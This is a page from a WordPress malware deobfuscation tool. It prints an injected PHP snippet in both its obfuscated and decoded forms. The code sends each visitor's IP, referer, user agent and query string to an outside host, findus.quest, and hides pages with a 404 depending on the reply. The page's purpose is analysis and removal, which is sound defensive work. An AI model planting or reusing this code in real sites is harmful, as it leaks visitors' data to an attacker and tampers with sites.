Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php if (!function_exists('x6zr7HRenS')) { function x6zr7HRenS() { $x9w4NS = $_SERVER['SERVER_ADDR']; $xz6COCZ6zO = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xz6COCZ6zO) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($x9w4NS...



Obfuscated php code

<?php
 if (!function_exists('x6zr7HRenS')) 
 { function x6zr7HRenS() { $x9w4NS = $_SERVER['SERVER_ADDR']; $xz6COCZ6zO = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xz6COCZ6zO) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($x9w4NS))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$xz6COCZ6zO)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$xz6COCZ6zO) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($x9w4NS))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$xz6COCZ6zO) && (($_SERVER['HTTP_CLIENT_IP'])!=($x9w4NS))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }}
  $ip=x6zr7HRenS(); 
 if (!function_exists('truer'))
 { function truer() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} 
  $ref=truer(); 
 if (!function_exists('xSNSw2Xye5'))
 { function xSNSw2Xye5() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} 
  $ua=xSNSw2Xye5(); 
 if ($_SERVER['QUERY_STRING']!=''){ $data = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$data = '';} 
 $sourcename = 'ch'; $cl0ip = 'find'; $sourceid = 'tds3'; $cl1ip = 'us'; $fd = 'c009333'; $cl2ip = '.que'; $langua = 'na';  $cl3ip = 'st'; 
 $ch = curl_init(); 
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); 
 curl_setopt($ch, CURLOPT_URL, 'https://'.$cl0ip.''.$cl1ip.''.$cl2ip.''.$cl3ip.'/'.$cl1ip.''.$cl3ip.'.php'); 
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); 
 curl_setopt($ch, CURLOPT_TIMEOUT,333); 
 curl_setopt($ch, CURLOPT_POST, true); 
 curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$ua.'&data='.$data.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); 
 $ifbot = curl_exec($ch); 
 curl_close($ch); 
 if ($ifbot != '0') { exit(header('Status: 404 Not Found')); } else {  } ?>

Decoded(de-Obfuscated) php code

<?php

if (!function_exists('x6zr7HRenS')) {
    function x6zr7HRenS()
    {
        $x9w4NS = $_SERVER['SERVER_ADDR'];
        $xz6COCZ6zO = '127.0.0.1';
        if (!empty($_SERVER['HTTP_CF_CONNECTING_IP']) && $_SERVER['HTTP_CF_CONNECTING_IP'] != $xz6COCZ6zO && $_SERVER['HTTP_CF_CONNECTING_IP'] != $x9w4NS) {
            $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
        } elseif (!empty($_SERVER['GEOIP_ADDR']) && $_SERVER['GEOIP_ADDR'] != $xz6COCZ6zO) {
            $ip = $_SERVER['GEOIP_ADDR'];
        } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != $xz6COCZ6zO && $_SERVER['HTTP_X_FORWARDED_FOR'] != $x9w4NS) {
            $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
        } elseif (!empty($_SERVER['HTTP_CLIENT_IP']) && $_SERVER['HTTP_CLIENT_IP'] != $xz6COCZ6zO && $_SERVER['HTTP_CLIENT_IP'] != $x9w4NS) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        return $ip;
    }
}
$ip = x6zr7HRenS();
if (!function_exists('truer')) {
    function truer()
    {
        if (empty($_SERVER['HTTP_REFERER'])) {
            $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER');
        }
        return $_SERVER['HTTP_REFERER'];
    }
}
$ref = truer();
if (!function_exists('xSNSw2Xye5')) {
    function xSNSw2Xye5()
    {
        if (empty($_SERVER['HTTP_USER_AGENT'])) {
            $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT');
        }
        return $_SERVER['HTTP_USER_AGENT'];
    }
}
$ua = xSNSw2Xye5();
if ($_SERVER['QUERY_STRING'] != '') {
    $data = '' . urlencode($_SERVER['QUERY_STRING']) . '';
} else {
    $data = '';
}
$sourcename = 'ch';
$cl0ip = 'find';
$sourceid = 'tds3';
$cl1ip = 'us';
$fd = 'c009333';
$cl2ip = '.que';
$langua = 'na';
$cl3ip = 'st';
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_URL, "https://findus.quest/usst.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 333);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "fd=c009333&ip=" . $ip . '&ref=' . $ref . '&ua=' . $ua . '&data=' . $data . '&sourceid=' . $sourceid . '&sourcename=' . $sourcename . '');
$ifbot = curl_exec($ch);
curl_close($ch);
if ($ifbot != '0') {
    exit(header('Status: 404 Not Found'));
} else {
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.